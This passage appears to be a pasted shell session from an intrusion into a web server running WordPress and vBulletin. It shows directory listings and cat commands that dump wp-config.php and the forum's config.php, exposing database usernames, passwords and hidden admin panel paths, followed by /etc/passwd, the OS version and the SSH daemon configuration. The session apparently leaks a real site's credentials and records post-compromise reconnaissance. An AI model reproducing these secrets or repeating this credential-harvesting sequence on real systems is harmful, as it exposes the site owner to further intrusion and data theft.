  2639. drwxr-xr-x  2 www-data www-data     4096 Jul  9 14:42 scripts
  2640. -rw-r--r--  1 www-data www-data     1056 Sep  3 18:05 search-mobile.php
  2641. -rw-r--r--  1 www-data www-data      108 Aug 26 04:53 search.php
  2642. -rw-r--r--  1 www-data www-data  3337393 Dec  1 07:47 sitemap.xml
  2643. -rw-r--r--  1 www-data www-data     3462 Aug 19 11:37 sitemap.xsl
  2644. -rw-r--r--  1 www-data www-data    30533 Nov 30 17:52 sitemap_blog.xml
  2645. -rw-r--r--  1 www-data www-data     4229 Nov 30 17:52 sitemap_blog.xml.gz
  2646. drwxr-xr-x  3 www-data www-data     4096 Jul  9 14:42 slider
  2647. drwxr-xr-x  2 www-data www-data    20480 Dec  4 09:18 sploits
  2648. -rw-r--r--  1 www-data www-data     9621 Nov  3 19:52 style.css
  2649. drwxr-xr-x  2 www-data www-data     4096 Sep 23 06:40 testme
  2650. -rw-r--r--  1 www-data www-data     5699 Nov  4 07:22 tpl_search.php
  2651. -rw-r--r--  1 www-data www-data       16 Nov 28 06:52 update-982374.txt
  2652. -rw-r--r--  1 www-data www-data       50 Aug 26 04:53 updated.php
  2653. drwxr-xr-x  3 www-data www-data     4096 Aug  3 09:35 videos
  2654. -rw-r--r--  1 www-data www-data     4391 Aug 26 04:53 wp-activate.php
  2655. drwxr-xr-x  8 www-data www-data     4096 Nov 11 17:59 wp-admin
  2656. -rw-r--r--  1 www-data www-data    40284 Aug 26 04:53 wp-app.php
  2657. -rw-r--r--  1 www-data www-data      220 Aug 26 04:53 wp-atom.php
  2658. -rw-r--r--  1 www-data www-data      274 Aug 26 04:53 wp-blog-header.php
  2659. -rw-r--r--  1 www-data www-data     3926 Aug 26 04:53 wp-comments-post.php
  2660. -rw-r--r--  1 www-data www-data      238 Aug 26 04:53 wp-commentsrss2.php
  2661. -rw-r--r--  1 www-data www-data     3173 Aug 26 04:53 wp-config-sample.php
  2662. -rw-r--r--  1 www-data www-data     2832 Nov 11 17:59 wp-config.php
  2663. drwxr-xr-x  8 www-data www-data     4096 Dec  3 22:49 wp-content
  2664. -rw-r--r--  1 www-data www-data     1255 Aug 26 04:53 wp-cron.php
  2665. -rw-r--r--  1 www-data www-data      240 Aug 26 04:53 wp-feed.php
  2666. drwxr-xr-x  7 www-data www-data     4096 Sep  8 13:52 wp-includes
  2667. -rw-r--r--  1 www-data www-data     2002 Aug 26 04:53 wp-links-opml.php
  2668. -rw-r--r--  1 www-data www-data     2441 Aug 26 04:53 wp-load.php
  2669. -rw-r--r--  1 www-data www-data    26160 Sep  3 21:48 wp-login.php
  2670. -rw-r--r--  1 www-data www-data     7774 Aug 26 04:53 wp-mail.php
  2671. -rw-r--r--  1 www-data www-data      487 Aug 26 04:53 wp-pass.php
  2672. -rw-r--r--  1 www-data www-data      218 Aug 26 04:53 wp-rdf.php
  2673. -rw-r--r--  1 www-data www-data      316 Aug 26 04:53 wp-register.php
  2674. -rw-r--r--  1 www-data www-data      218 Aug 26 04:53 wp-rss.php
  2675. -rw-r--r--  1 www-data www-data      220 Aug 26 04:53 wp-rss2.php
  2676. -rw-r--r--  1 www-data www-data     9177 Sep  8 13:01 wp-settings.php
  2677. -rw-r--r--  1 www-data www-data    18695 Aug 26 04:53 wp-signup.php
  2678. -rw-r--r--  1 www-data www-data     3702 Aug 26 04:53 wp-trackback.php
  2679. -rw-r--r--  1 www-data www-data    93955 Aug 26 04:53 xmlrpc-orig.php
  2680. -rw-r--r--  1 www-data www-data    94184 Aug 26 04:53 xmlrpc.php
  2681.  
  2682.  
  2683. $ cat wp-config.php
  2684. <?php
  2685. /**
  2686.  * The base configurations of the WordPress.
  2687.  *
  2688.  * This file has the following configurations: MySQL settings, Table Prefix,
  2689.  * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
  2690.  * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
  2691.  * wp-config.php} Codex page. You can get the MySQL settings from your web host.
  2692.  *
  2693.  * This file is used by the wp-config.php creation script during the
  2694.  * installation. You don't have to use the web site, you can just copy this file
  2695.  * to "wp-config.php" and fill in the values.
  2696.  *
  2697.  * @package WordPress
  2698.  */
  2699.  
  2700. // ** MySQL settings - You can get this info from your web host ** //
  2701. /** The name of the database for WordPress */
  2702. //define('DB_NAME', 'explot2');
  2703. define('WP_CACHE', true); //Added by WP-Cache Manager
  2704. define('DB_NAME', 'edb_new');
  2705.  
  2706. /** MySQL database username */
  2707. define('DB_USER', 'edbuser');
  2708.  
  2709. /** MySQL database password */
  2710. //define('DB_PASSWORD', 'admin123');
  2711. define('DB_PASSWORD', '2834729347928372342');
  2712. //define('DB_PASSWORD', 'f00b204e98009d22b68e54a');
  2713.  
  2714. /** MySQL hostname */
  2715. define('DB_HOST', 'localhost');
  2716. define('WP_MEMORY_LIMIT', '1024M');
  2717. /** Database Charset to use in creating database tables. */
  2718. define('DB_CHARSET', 'utf8');
  2719.  
  2720. /** The Database Collate type. Don't change this if in doubt. */
  2721. define('DB_COLLATE', '');
  2722. define('FORCE_SSL_LOGIN', true);
  2723.  
  2724. /**#@+
  2725.  * Authentication Unique Keys.
  2726.  *
  2727.  * Change these to different unique phrases!
  2728.  * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-k
  2729.  * You can change these at any point in time to invalidate all existing cookies. This will force all users
  2730.  in again.
  2731.  *
  2732.  * @since 2.6.0
  2733.  */
  2734. define('AUTH_KEY', 'put your unique phrase here');
  2735. define('SECURE_AUTH_KEY', 'put your unique phrase here');
  2736. define('LOGGED_IN_KEY', 'put your unique phrase here');
  2737. define('NONCE_KEY', 'put your unique phrase here');
  2738. /**#@-*/
  2739.  
  2740. /**
  2741.  * WordPress Database Table prefix.
  2742.  *
  2743.  * You can have multiple installations in one database if you give each a unique
  2744.  * prefix. Only numbers, letters, and underscores please!
  2745.  */
  2746. $table_prefix  = 'wp_';
  2747.  
  2748. /**
  2749.  * WordPress Localized Language, defaults to English.
  2750.  *
  2751.  * Change this to localize WordPress.  A corresponding MO file for the chosen
  2752.  * language must be installed to wp-content/languages. For example, install
  2753.  * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
  2754.  * language support.
  2755.  */
  2756. define ('WPLANG', '');
  2757.  
  2758. /* That's all, stop editing! Happy blogging. */
  2759.  
  2760. /** Absolute path to the WordPress directory. */
  2761. if ( !defined('ABSPATH') )
  2762.         define('ABSPATH', dirname(__FILE__) . '/');
  2763.  
  2764. /** Sets up WordPress vars and included files. */
  2765. require_once(ABSPATH . 'wp-settings.php');
  2766.  
  2767. define('WP_DEBUG',true);
  2768. define('WP_MEMORY_LIMIT', '128M');
  2769.  
  2770. $ cd forums
  2771.  
  2772. $ ls -la
  2773. total 2344
  2774. drwxr-xr-x 21 www-data www-data   4096 Nov 22 20:06 .
  2775. drwxr-xr-x 18 www-data www-data   4096 Nov 26 10:16 ..
  2776. -rw-r--r--  1 www-data www-data   1008 Nov  6 12:03 .htaccess
  2777. -rw-rw-r--  1 www-data www-data  17862 Nov 22 20:01 LICENSE
  2778. drwxr-xr-x  3 www-data www-data   4096 Nov 22 20:04 admincp
  2779. drwxr-xr-x  3 www-data www-data   4096 Nov 22 20:04 admincp-23987239874298273987234
  2780. -rwxr-xr-x  1 www-data www-data  40193 Nov 22 20:01 ajax.php
  2781. -rwxr-xr-x  1 www-data www-data  75603 Nov 22 20:01 album.php
  2782. -rwxr-xr-x  1 www-data www-data  19119 Nov 22 20:01 announcement.php
  2783. drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:22 archive
  2784. -rwxr-xr-x  1 www-data www-data   9040 Nov 22 20:01 asset.php
  2785. -rwxr-xr-x  1 www-data www-data  21161 Nov 22 20:01 assetmanage.php
  2786. -rwxr-xr-x  1 www-data www-data  15788 Nov 22 20:01 attachment.php
  2787. -rwxr-xr-x  1 www-data www-data   6935 Nov 22 20:01 attachment_inlinemod.php
  2788. -rwxr-xr-x  1 www-data www-data   3616 Nov 22 20:01 blog_attachment.php
  2789. -rwxr-xr-x  1 www-data www-data  96121 Nov 22 20:01 calendar.php
  2790. -rwxr-xr-x  1 www-data www-data     43 Nov 22 20:01 clear.gif
  2791. drwxr-xr-x  9 www-data www-data   4096 Nov  6 11:22 clientscript
  2792. -rwxr-xr-x  1 www-data www-data  15786 Nov 22 20:01 converse.php
  2793. drwxr-xr-x  7 www-data www-data   4096 Nov  6 11:22 cpstyles
  2794. -rwxr-xr-x  1 www-data www-data   3309 Nov 22 20:01 cron.php
  2795. -rwxr-xr-x  1 www-data www-data   6145 Nov 22 20:01 css.php
  2796. drwxr-xr-x  3 www-data www-data   4096 Nov  6 11:22 customavatars
  2797. drwxr-xr-x  3 www-data www-data   4096 Nov  6 11:22 customgroupicons
  2798. drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:22 customprofilepics
  2799. -rwxr-xr-x  1 www-data www-data   1823 Nov 22 20:01 editor.php
  2800. -rwxr-xr-x  1 www-data www-data  47010 Nov 22 20:01 editpost.php
  2801. -rwxr-xr-x  1 www-data www-data   1427 Nov 22 20:01 entry.php
  2802. -rwxr-xr-x  1 www-data www-data  30084 Nov 22 20:01 external.php
  2803. -rwxr-xr-x  1 www-data www-data   9966 Nov 22 20:01 faq.php
  2804. -rwxr-xr-x  1 www-data www-data  10134 Nov 22 20:01 favicon.ico
  2805. -rwxr-xr-x  1 www-data www-data  23332 Nov 22 20:01 forum.php
  2806. -rwxr-xr-x  1 www-data www-data  42452 Nov 22 20:01 forumdisplay.php
  2807. -rwxr-xr-x  1 www-data www-data   2066 Nov 22 20:01 global.php
  2808. -rwxr-xr-x  1 www-data www-data 155838 Nov 22 20:01 group.php
  2809. -rwxr-xr-x  1 www-data www-data  26150 Nov 22 20:01 group_inlinemod.php
  2810. -rwxr-xr-x  1 www-data www-data  11883 Nov 22 20:01 groupsubscription.php
  2811. -rwxr-xr-x  1 www-data www-data   9039 Nov 22 20:01 image.php
  2812. drwxr-xr-x 24 www-data www-data   4096 Nov  6 13:16 images
  2813. drwxr-xr-x  8 www-data www-data  12288 Nov  6 14:29 includes
  2814. -rwxr-xr-x  1 www-data www-data   2396 Nov 22 20:01 index.php
  2815. -rwxr-xr-x  1 www-data www-data  47021 Nov 22 20:01 infraction.php
  2816. -rwxr-xr-x  1 www-data www-data 187803 Nov 22 20:01 inlinemod.php
  2817. -rwxr-xr-x  1 www-data www-data  11440 Nov 22 20:01 joinrequests.php
  2818. -rwxr-xr-x  1 www-data www-data   1757 Nov 22 20:01 list.php
  2819. -rwxr-xr-x  1 www-data www-data  10947 Nov 22 20:01 login.php
  2820. -rwxr-xr-x  1 www-data www-data  30244 Nov 22 20:01 member.php
  2821. -rwxr-xr-x  1 www-data www-data  16392 Nov 22 20:01 member_inlinemod.php
  2822. -rwxr-xr-x  1 www-data www-data  40345 Nov 22 20:01 memberlist.php
  2823. -rwxr-xr-x  1 www-data www-data  22264 Nov 22 20:01 misc.php
  2824. drwxr-xr-x  2 www-data www-data   4096 Nov 22 20:01 modcp
  2825. drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:55 modcp-23987239874298273987234
  2826. -rwxr-xr-x  1 www-data www-data  76827 Nov 22 20:01 moderation.php
  2827. -rwxr-xr-x  1 www-data www-data   6779 Nov 22 20:01 moderator.php
  2828. -rwxr-xr-x  1 www-data www-data  17552 Nov 22 20:01 newattachment.php
  2829. -rwxr-xr-x  1 www-data www-data  41079 Nov 22 20:01 newreply.php
  2830. -rwxr-xr-x  1 www-data www-data  20185 Nov 22 20:01 newthread.php
  2831. -rwxr-xr-x  1 www-data www-data  21802 Nov 22 20:01 online.php
  2832. drwxr-xr-x  5 www-data www-data   4096 Nov  6 11:22 packages
  2833. -rwxr-xr-x  1 www-data www-data   8096 Nov 22 20:01 payment_gateway.php
  2834. -rwxr-xr-x  1 www-data www-data  13360 Nov 22 20:01 payments.php
  2835. -rwxr-xr-x  1 www-data www-data   4156 Nov 22 20:01 picture.php
  2836. -rwxr-xr-x  1 www-data www-data  16665 Nov 22 20:01 picture_inlinemod.php
  2837. -rwxr-xr-x  1 www-data www-data  26169 Nov 22 20:01 picturecomment.php
  2838. -rwxr-xr-x  1 www-data www-data  29338 Nov 22 20:01 poll.php
  2839. -rwxr-xr-x  1 www-data www-data  10414 Nov 22 20:01 posthistory.php
  2840. -rwxr-xr-x  1 www-data www-data  76585 Nov 22 20:01 postings.php
  2841. -rwxr-xr-x  1 www-data www-data   7087 Nov 22 20:01 printthread.php
  2842. -rwxr-xr-x  1 www-data www-data  79435 Nov 22 20:01 private.php
  2843. -rwxr-xr-x  1 www-data www-data 163695 Nov 22 20:01 profile.php
  2844. -rwxr-xr-x  1 www-data www-data  56363 Nov 22 20:01 register.php
  2845. -rwxr-xr-x  1 www-data www-data   7294 Nov 22 20:01 report.php
  2846. -rwxr-xr-x  1 www-data www-data  14765 Nov 22 20:01 reputation.php
  2847. -rwxr-xr-x  1 www-data www-data  35793 Nov 22 20:01 search.php
  2848. -rwxr-xr-x  1 www-data www-data  22710 Nov 22 20:01 sendmessage.php
  2849. -rwxr-xr-x  1 www-data www-data  12485 Nov 22 20:01 showgroups.php
  2850. -rwxr-xr-x  1 www-data www-data  12738 Nov 22 20:01 showpost.php
  2851. -rwxr-xr-x  1 www-data www-data  80115 Nov 22 20:01 showthread.php
  2852. drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:22 signaturepics
  2853. drwxr-xr-x  2 www-data www-data   4096 Nov  6 11:22 store_sitemap
  2854. -rwxr-xr-x  1 www-data www-data  38862 Nov 22 20:01 subscription.php
  2855. -rwxr-xr-x  1 www-data www-data   5399 Nov 22 20:01 tags.php
  2856. -rwxr-xr-x  1 www-data www-data   8800 Nov 22 20:01 threadrate.php
  2857. -rwxr-xr-x  1 www-data www-data  11146 Nov 22 20:01 threadtag.php
  2858. -rwxr-xr-x  1 www-data www-data     61 Nov 22 20:01 uploadprogress.gif
  2859. -rwxr-xr-x  1 www-data www-data  39717 Nov 22 20:01 usercp.php
  2860. -rwxr-xr-x  1 www-data www-data  21034 Nov 22 20:01 usernote.php
  2861. drwxr-xr-x 13 www-data www-data   4096 Nov  6 11:22 vb
  2862. drwxr-xr-x  8 www-data www-data   4096 Nov  6 12:23 vboptimise
  2863. -rw-r--r--  1 www-data www-data   2324 Nov  6 12:23 vboptimise.php
  2864. drwxr-xr-x  4 www-data www-data   4096 Nov  6 11:55 vbseo
  2865. -rw-r--r--  1 www-data www-data  45286 Nov  6 11:55 vbseo.php
  2866. drwxr-xr-x  4 www-data www-data   4096 Nov  6 14:29 vbseo_sitemap
  2867. -rw-r--r--  1 www-data www-data   4335 Nov  6 11:55 vbseocp.php
  2868. -rwxr-xr-x  1 www-data www-data  27879 Nov 22 20:01 visitormessage.php
  2869. -rwxr-xr-x  1 www-data www-data   1761 Nov 22 20:01 widget.php
  2870. -rwxr-xr-x  1 www-data www-data   3952 Nov 22 20:01 xmlsitemap.php
  2871.  
  2872. $ cat includes/config.php
  2873. <?php
  2874. /*======================================================================*\
  2875. || #################################################################### ||
  2876. || # vBulletin 4.0.8
  2877. || # ---------------------------------------------------------------- # ||
  2878. || # All PHP code in this file is �2000-2010 vBulletin Solutions Inc. # ||
  2879. || # This file may not be redistributed in whole or significant part. # ||
  2880. || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
  2881. || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
  2882. || #################################################################### ||
  2883. \*======================================================================*/
  2884.  
  2885. /*-------------------------------------------------------*\
  2886. | ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
  2887. +---------------------------------------------------------+
  2888. | If you get any errors while attempting to connect to    |
  2889. | MySQL, you will need to email your webhost because we   |
  2890. | cannot tell you the correct values for the variables    |
  2891. | in this file.                                           |
  2892. \*-------------------------------------------------------*/
  2893.  
  2894.         //      ****** DATABASE TYPE ******
  2895.         //      This is the type of the database server on which your vBulletin database will be located.
  2896.         //      Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP
  2897.  5 and MySQL 4.1+
  2898.         // for slave options just append _slave to your preferred database type.
  2899. $config['Database']['dbtype'] = 'mysql';
  2900.  
  2901.         //      ****** DATABASE NAME ******
  2902.         //      This is the name of the database where your vBulletin will be located.
  2903.         //      This must be created by your webhost.
  2904. $config['Database']['dbname'] = 'edbforum';
  2905.  
  2906.         //      ****** TABLE PREFIX ******
  2907.         //      Prefix that your vBulletin tables have in the database.
  2908. $config['Database']['tableprefix'] = '';
  2909.  
  2910.         //      ****** TECHNICAL EMAIL ADDRESS ******
  2911.         //      If any database errors occur, they will be emailed to the address specified here.
  2912.         //      Leave this blank to not send any emails when there is a database error.
  2913. $config['Database']['technicalemail'] = 'dbmaster@example.com';
  2914.  
  2915.         //      ****** FORCE EMPTY SQL MODE ******
  2916.         // New versions of MySQL (4.1+) have introduced some behaviors that are
  2917.         // incompatible with vBulletin. Setting this value to "true" disables those
  2918.         // behaviors. You only need to modify this value if vBulletin recommends it.
  2919. $config['Database']['force_sql_mode'] = false;
  2920.  
  2921.  
  2922.  
  2923.         //      ****** MASTER DATABASE SERVER NAME AND PORT ******
  2924.         //      This is the hostname or IP address and port of the database server.
  2925.         //      If you are unsure of what to put here, leave the default values.
  2926.         //
  2927.         //      Note: If you are using IIS 7+ and MySQL is on the same machine, you
  2928.         //      need to use 127.0.0.1 instead of localhost
  2929. $config['MasterServer']['servername'] = 'localhost';
  2930. $config['MasterServer']['port'] = 3306;
  2931.  
  2932.         //      ****** MASTER DATABASE USERNAME & PASSWORD ******
  2933.         //      This is the username and password you use to access MySQL.
  2934.         //      These must be obtained through your webhost.
  2935. $config['MasterServer']['username'] = 'forums';
  2936. $config['MasterServer']['password'] = '2834725234523472342';
  2937.  
  2938.         //      ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
  2939.         //      This option allows you to turn persistent connections to MySQL on or off.
  2940.         //      The difference in performance is negligible for all but the largest boards.
  2941.         //      If you are unsure what this should be, leave it off. (0 = off; 1 = on)
  2942. $config['MasterServer']['usepconnect'] = 0;
  2943.  
  2944.  
  2945.  
  2946.         //      ****** SLAVE DATABASE CONFIGURATION ******
  2947.         //      If you have multiple database backends, this is the information for your slave
  2948.         //      server. If you are not 100% sure you need to fill in this information,
  2949.         //      do not change any of the values here.
  2950. $config['SlaveServer']['servername'] = '';
  2951. $config['SlaveServer']['port'] = 3306;
  2952. $config['SlaveServer']['username'] = '';
  2953. $config['SlaveServer']['password'] = '';
  2954. $config['SlaveServer']['usepconnect'] = 0;
  2955.  
  2956.  
  2957.  
  2958.         //      ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
  2959.         //      This setting allows you to change the name of the folders that the admin and
  2960.         //      moderator control panels reside in. You may wish to do this for security purposes.
  2961.         //      Please note that if you change the name of the directory here, you will still need
  2962.         //      to manually change the name of the directory on the server.
  2963. $config['Misc']['admincpdir'] = 'admincp-23987239874298273987234';
  2964. $config['Misc']['modcpdir'] = 'modcp-23987239874298273987234';
  2965.  
  2966.         //      Prefix that all vBulletin cookies will have
  2967.         //      Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
  2968. $config['Misc']['cookieprefix'] = 'bb';
  2969.  
  2970.         //      ******** FULL PATH TO FORUMS DIRECTORY ******
  2971.         //      On a few systems it may be necessary to input the full path to your forums directory
  2972.         //      for vBulletin to function normally. You can ignore this setting unless vBulletin
  2973.         //      tells you to fill this in. Do not include a trailing slash!
  2974.         //      Example Unix:
  2975.         //        $config['Misc']['forumpath'] = '/home/users/public_html/forums';
  2976.         //      Example Win32:
  2977.         //        $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
  2978. $config['Misc']['forumpath'] = '';
  2979.  
  2980.  
  2981.  
  2982.         //      ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
  2983.         //      The users specified here will be allowed to view the admin log in the control panel.
  2984.         //      Users must be specified by *ID number* here. To obtain a user's ID number,
  2985.         //      view their profile via the control panel. If this is a new installation, leave
  2986.         //      the first user created will have a user ID of 1. Seperate each userid with a comma.
  2987. $config['SpecialUsers']['canviewadminlog'] = '1';
  2988.  
  2989.         //      ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
  2990.         //      The users specified here will be allowed to remove ("prune") entries from the admin
  2991.         //      log. See the above entry for more information on the format.
  2992. $config['SpecialUsers']['canpruneadminlog'] = '1';
  2993.  
  2994.         //      ****** USERS WITH QUERY RUNNING PERMISSIONS ******
  2995.         //      The users specified here will be allowed to run queries from the control panel.
  2996.         //      See the above entries for more information on the format.
  2997.         //      Please note that the ability to run queries is quite powerful. You may wish
  2998.         //      to remove all user IDs from this list for security reasons.
  2999. $config['SpecialUsers']['canrunqueries'] = '';
  3000.  
  3001.         //      ****** UNDELETABLE / UNALTERABLE USERS ******
  3002.         //      The users specified here will not be deletable or alterable from the control panel by any users.
  3003.         //      To specify more than one user, separate userids with commas.
  3004. $config['SpecialUsers']['undeletableusers'] = '';
  3005.  
  3006.         //      ****** SUPER ADMINISTRATORS ******
  3007.         //      The users specified below will have permission to access the administrator permissions
  3008.         //      page, which controls the permissions of other administrators
  3009. $config['SpecialUsers']['superadministrators'] = '1';
  3010.  
  3011.         // ****** DATASTORE CACHE CONFIGURATION *****
  3012.         // Here you can configure different methods for caching datastore items.
  3013.         // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
  3014.         // vB_Datastore_APC - to use APC
  3015.         // vB_Datastore_XCache - to use XCache
  3016.         // vB_Datastore_Memcached - to use a Memcache server, more configuration below
  3017. // $config['Datastore']['class'] = 'vB_Datastore_Filecache';
  3018.  
  3019.         // ******** DATASTORE PREFIX ******
  3020.         // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
  3021.         // than one set of forums installed on your host, you *may* need to use a prefix
  3022.         // so that they do not try to use the same variable within the cache.
  3023.         // This works in a similar manner to the database table prefix.
  3024. // $config['Datastore']['prefix'] = '';
  3025.  
  3026.         // It is also necessary to specify the hostname or IP address and the port the server is listening on
  3027. /*
  3028. $config['Datastore']['class'] = 'vB_Datastore_Memcached';
  3029. $i = 0;
  3030. // First Server
  3031. $i++;
  3032. $config['Misc']['memcacheserver'][$i]           = '127.0.0.1';
  3033. $config['Misc']['memcacheport'][$i]                     = 11211;
  3034. $config['Misc']['memcachepersistent'][$i]       = true;
  3035. $config['Misc']['memcacheweight'][$i]           = 1;
  3036. $config['Misc']['memcachetimeout'][$i]          = 1;
  3037. $config['Misc']['memcacheretry_interval'][$i] = 15;
  3038. */
  3039.  
  3040. // ****** The following options are only needed in special cases ******
  3041.  
  3042.         //      ****** MySQLI OPTIONS *****
  3043.         // When using MySQL 4.1+, MySQLi should be used to connect to the database.
  3044.         // If you need to set the default connection charset because your database
  3045.         // is using a charset other than latin1, you can set the charset here.
  3046.         // If you don't set the charset to be the same as your database, you
  3047.         // may receive collation errors.  Ignore this setting unless you
  3048.         // are sure you need to use it.
  3049. // $config['Mysqli']['charset'] = 'utf8';
  3050.  
  3051.         //      Optionally, PHP can be instructed to set connection parameters by reading from the
  3052.         //      file named in 'ini_file'. Please use a full path to the file.
  3053.         //      Example:
  3054.         //      $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
  3055. $config['Mysqli']['ini_file'] = '';
  3056.  
  3057. // Image Processing Options
  3058.         // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger image
  3059. s, alter these settings.
  3060. $config['Misc']['maxwidth'] = 2592;
  3061. $config['Misc']['maxheight'] = 1944;
  3062.  
  3063. /*======================================================================*\
  3064. || ####################################################################
  3065. || # Downloaded: 10:22, Sat Nov 6th 2010
  3066. || # CVS: $RCSfile$ - $Revision: 39199 $
  3067. || ####################################################################
  3068. \*======================================================================*/
  3069.  
  3070. $ cd /
  3071.  
  3072. $ ls -la
  3073. total 112
  3074. drwxr-xr-x  26 root root  4096 Nov 30 06:53 .
  3075. drwxr-xr-x  26 root root  4096 Nov 30 06:53 ..
  3076. drw-------   2 root root  4096 Dec  4 03:45 backup
  3077. drw-------   2 root root  4096 Sep  1 07:38 backup-fix
  3078. drwxr-xr-x   2 root root  4096 Oct 11 09:00 bin
  3079. drwxr-xr-x   3 root root  4096 Nov 30 06:53 boot
  3080. drwxr-xr-x   3 root root  4096 Nov 11 16:56 build
  3081. drwxr-xr-x   2 root root  4096 Jul  9 05:29 cdrom
  3082. drwxr-xr-x  14 root root  3800 Nov 30 06:53 dev
  3083. drwxr-xr-x  91 root root  4096 Dec  2 06:34 etc
  3084. drwxr-xr-x   3 root root  4096 Aug  3 11:48 home
  3085. lrwxrwxrwx   1 root root    32 Nov 30 06:53 initrd.img -> boot/initrd.img-2.6.32-26-server
  3086. lrwxrwxrwx   1 root root    32 Oct  4 16:30 initrd.img.old -> boot/initrd.img-2.6.32-25-server
  3087. drwxr-xr-x  13 root root 12288 Nov 18 06:54 lib
  3088. lrwxrwxrwx   1 root root     4 Jul  9 05:28 lib64 -> /lib
  3089. drwx------   2 root root 16384 Jul  9 05:28 lost+found
  3090. drwxr-xr-x   2 root root  4096 Jul  9 15:17 maint
  3091. drwxr-xr-x   3 root root  4096 Jul  9 05:28 media
  3092. drwxr-xr-x   4 root root  4096 Jul  9 20:03 mnt
  3093. drwxr-xr-x   3 root root  4096 Oct  7 16:53 opt
  3094. dr-xr-xr-x 227 root root     0 Nov 11 10:45 proc
  3095. drwx------   9 root root  4096 Nov 25 09:08 root
  3096. drwxr-xr-x   2 root root  4096 Oct 29 19:00 sbin
  3097. drwxr-xr-x   2 root root  4096 Dec  5  2009 selinux
  3098. drwxr-xr-x   2 root root  4096 Jul  9 05:28 srv
  3099. drwxr-xr-x  13 root root     0 Nov 11 10:45 sys
  3100. drwxrwxrwt   3 root root  4096 Dec  4 14:59 tmp
  3101. drwxr-xr-x  10 root root  4096 Jul  9 05:28 usr
  3102. drwxr-xr-x  19 root root  4096 Sep 24 09:26 var
  3103. lrwxrwxrwx   1 root root    29 Nov 30 06:53 vmlinuz -> boot/vmlinuz-2.6.32-26-server
  3104. lrwxrwxrwx   1 root root    29 Oct  4 16:30 vmlinuz.old -> boot/vmlinuz-2.6.32-25-server
  3105.  
  3106. $ cat /etc/passwd
  3107. root:x:0:0:root:/root:/bin/bash
  3108. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  3109. bin:x:2:2:bin:/bin:/bin/sh
  3110. sys:x:3:3:sys:/dev:/bin/sh
  3111. sync:x:4:65534:sync:/bin:/bin/sync
  3112. games:x:5:60:games:/usr/games:/bin/sh
  3113. man:x:6:12:man:/var/cache/man:/bin/sh
  3114. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  3115. mail:x:8:8:mail:/var/mail:/bin/sh
  3116. news:x:9:9:news:/var/spool/news:/bin/sh
  3117. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  3118. proxy:x:13:13:proxy:/bin:/bin/sh
  3119. www-data:x:33:33:www-data:/var/www:/bin/sh
  3120. backup:x:34:34:backup:/var/backups:/bin/sh
  3121. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  3122. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  3123. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  3124. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  3125. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  3126. syslog:x:101:103::/home/syslog:/bin/false
  3127. sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
  3128. landscape:x:103:108::/var/lib/landscape:/bin/false
  3129. mysql:x:104:112:MySQL Server,,,:/var/lib/mysql:/bin/false
  3130. smmta:x:105:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
  3131. smmsp:x:106:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
  3132. emgent:x:1003:1002:,,,:/home/emgent:/bin/bash
  3133. ossec:x:1004:1003::/var/ossec:/bin/false
  3134. ossecm:x:1005:1003::/var/ossec:/bin/false
  3135. ossecr:x:1006:1003::/var/ossec:/bin/false
  3136.  
  3137. $ cat /etc/issue
  3138. Ubuntu 10.04.1 LTS \n \l
  3139.  
  3140.  
  3141. $ cat /etc/ssh/sshd_config
  3142. # Package generated configuration file
  3143. # See the sshd_config(5) manpage for details
  3144.  
  3145. # What ports, IPs and protocols we listen for
  3146. Port 22
  3147. # Use these options to restrict which interfaces/protocols sshd will bind to
  3148. #ListenAddress ::
  3149. #ListenAddress 0.0.0.0
  3150. Protocol 2
  3151. # HostKeys for protocol version 2
  3152. HostKey /etc/ssh/ssh_host_rsa_key
  3153. HostKey /etc/ssh/ssh_host_dsa_key
  3154. #Privilege Separation is turned on for security
  3155. UsePrivilegeSeparation yes
  3156.  
  3157. # Lifetime and size of ephemeral version 1 server key
  3158. KeyRegenerationInterval 3600
  3159. ServerKeyBits 768
  3160.  
  3161. # Logging
  3162. SyslogFacility AUTH
  3163. LogLevel INFO
  3164.  
  3165. # Authentication:
  3166. LoginGraceTime 120
  3167. PermitRootLogin yes
  3168. StrictModes yes
  3169.  
  3170. RSAAuthentication yes
  3171. PubkeyAuthentication yes
  3172. #AuthorizedKeysFile     %h/.ssh/authorized_keys
  3173.  
  3174. # Don't read the user's ~/.rhosts and ~/.shosts files
  3175. IgnoreRhosts yes
  3176. # For this to work you will also need host keys in /etc/ssh_known_hosts
  3177. RhostsRSAAuthentication no
  3178. # similar for protocol version 2
  3179. HostbasedAuthentication no
  3180. # Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
  3181. #IgnoreUserKnownHosts yes
  3182.  
